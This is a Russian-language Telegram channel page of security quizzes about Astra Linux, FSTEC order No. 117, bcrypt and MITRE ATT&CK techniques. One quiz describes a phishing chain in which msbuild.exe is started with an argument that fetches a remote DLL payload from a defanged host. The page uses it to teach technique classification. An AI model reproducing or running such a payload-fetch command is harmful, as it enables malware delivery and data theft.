Linux Security
589 subscribers
13 photos
2 videos
17 files
188 links
Неофициальный канал про ОС Astra Linux. Для специалистов по ИБ, пользователей и администраторов.
Download Telegram
С прошедшими праздниками!
#УПД. Эта утилита простое решение для создания пользователей и по факту является надстройкой над groupadd, usermod и надстройкой над аналогичной низкоуровневой утилитой для создания пользователей
Anonymous Quiz
47%
useradd
45%
adduser
2%
addbot
5%
Пользователь создаётся после мотивированной заявки согласованной с ИБ, кадрами, бухгалтерии, ИТ....
1%
-givebots <название> и -createhero <название>
Создание пользователя в Linux. Команды adduser и useradd

https://pingvinus.ru/note/useradd
bcrypt — алгоритм на основе шифра Blowfish. Он был создан специально для хеширования паролей и имеет настраиваемый параметр «cost». За что параметр отвечает?
Anonymous Quiz
31%
Параметр отвечает за "соль" в хэше
7%
Цена, которую вы готовы заплатить за перс.данные пользователей
26%
Количество бит хэша
36%
Число раундов хеширования.
Опубликован новый приказ ФСТЭК России 117 взамен аналогичного 17 приказа, посвященный требованиям защиты ГИС. Какая добавилась новая базовая мера защиты?
Anonymous Quiz
33%
Защита виртуализации
26%
Защита контейнеризации
20%
Защита технологий интернета вещей
21%
Защита беспроводных соединений
Приказ ФСТЭК 117.pdf
2.4 MB
Требования о защите информации, содержащейся в ГИС и иных ИС госорганов и госорганизаций

Официально опубликован приказ ФСТЭК России от 11.04.2025 № 117 «Об утверждении Требований о защите информации, содержащейся в государственных информационных системах, иных информационных системах государственных органов, государственных унитарных предприятий, государственных учреждений».
Приказ ФСТЭК № 17 отменяется с 01.03.2026.
👍2
Какие команды нужны для ЗИС.21. Исключение доступа пользователя к инф., возникшей в результате действий предыдущего пользователя через реестры,оперативную пам., внешние запоминающие устройства и иные общие для пользователей ресурсы информационной системы
Anonymous Quiz
14%
1.astra-swapwiper-control enable
15%
2.astra-secdel-control enable
1%
3.astra-nobootmenu-control enable
38%
1 и 2 вариант
4%
2 и 3 вариант
3%
1 и 3 вариант
4%
4 и 7 вариант
20%
Ты обалдел так много вариантов?
1. Cотрудник получил письмо.
2. Открыл файл list.exe, маскирующийся под PDF.
3. На ПК запустился процесс msbuild.exe с аргументами: /tmp:7a1 /payload:https://me[.]xyz/get.dll 4. Процесс подключился к IP и начал копировать файлы. Какая это тактика?
Anonymous Quiz
7%
T1204.001 - Вредоносная ссылка
40%
T1204.002 - Вредоносный файл
19%
T1195.002 - Цепочка поставок компрометирующего программного обеспечения
7%
T1195.001 - Компрометация зависимого программного обеспечения и средств разработки
27%
Нехрен было ставить Винду
Матрица MITRE ATT&CK описывает тактики и техники, которыми злоумышленники пользуются в своих атаках на корпоративную инфраструктуру.

https://mitre.ptsecurity.com/ru-RU

Сервис моделирования от Кода безопасности

https://mitre.securitycode.ru/
Проверка на уязвимости средствами Astra Linux

https://wiki.astralinux.ru/pages/viewpage.action?pageId=331355418
ИАФ. Для этой схемы аутентификации требуется только имя пользователя и пароль. Клиент берет эти два удостоверения, склеивает их вместе, чтобы сформировать одно значение, и передает его в запросе (Например, в заголовке HTTP, называемом Authorization).
Anonymous Quiz
18%
Аутентификация по ключу API
64%
Базовая аутентификация (Basic)
11%
Открытая авторизация (Oauth)
7%
Digest схема
isp_37_2025_2_61.pdf
587.9 KB
Научная работа. Проектирование и развитие
механизма мандатного контроля целостности
в операционной системе Astra Linux
3
В 2024 году специалисты аналитического центра США из Совета по международным отношениям (Council on Foreign Relations, CFR) призвали задействовать спецслужбы для понимания уровня защищённости ОС Astra Linux. На что они хотели обратить внимание?
Anonymous Quiz
65%
Потенциальные уязвимости открытого программного обеспечения, которые по их мнению используются в ОС
6%
На то что некоторые пользователи не включают ЗПС
0%
На то что пользователи не всегда читают инструкции
29%
На то что РусБИТех не публикует свой исходный код
🤯1
ОДТ. В 2020 году вредоносный шифровальщик Trickbot продемонстрировал, что нужно уделять особое внимание архитектуре резервного копирования данных. Какая техника не была учтена при моделировании угроз атакованной компании?
Anonymous Quiz
25%
T1490 - Запрет восстановления системы
19%
T1498 - Сетевой отказ в обслуживании
40%
T1486 - Шифрование данных
9%
T1485 - Уничтожение данных
7%
T1561 - Очистка диска